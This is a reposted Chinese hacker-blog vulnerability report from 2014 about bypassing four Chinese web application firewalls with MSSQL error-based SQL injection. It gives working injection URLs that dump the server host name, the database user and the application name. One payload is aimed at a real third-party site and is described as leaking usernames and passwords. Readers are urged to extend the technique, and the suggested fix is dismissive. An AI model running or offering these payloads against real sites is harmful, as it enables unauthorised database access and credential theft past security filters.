记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

360/加速乐/百度云加速/安全宝等所有waf产品某些条件下绕过

2014-09-04 23:50

测试了下市面上 360/加速乐/百度云加速/安全宝

这四个waf产品 在某种条件下均可以绕过 顺利注射出数据库信息。



首先我自己搭建了环境 mssql+asp

构造了一个 数字型的报错注入点。



http://192.168.1.106:81/asp/num.asp?id=host_name()



b1.jpg





http://192.168.1.106:81/asp/num.asp?id=user

b2.jpg





http://192.168.1.106:81/asp/num.asp?id=APP_NAME()



b3.jpg





等等 可以根据内置变量爆出很多想要的信息。



另外 如果能猜到字段名还可以这样。



b4.jpg





爆出了用户名与密码。





在测试 做了 360网站卫士/加速乐/百度云加速/安全宝 保护的网站之后



对这种情况的注射都 束手无策,全部都放行。



这里仅用一例 说明

下面是加速乐保护的

http://www.cert.org.cn/num.asp?id=username%2b':'%2bpassword

b5.jpg



顺利放行。





以上所有测试url 这些waf产品均没有拦截





广大基友可以根据我抛出的砖发扬一下,弄出更厉害的东西出来。









漏洞证明:

同上

修复方案:

你们看着办

知识来源: www.wooyun.org/bugs/wooyun-2014-063822

阅读:97468 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“360/加速乐/百度云加速/安全宝等所有waf产品某些条件下绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云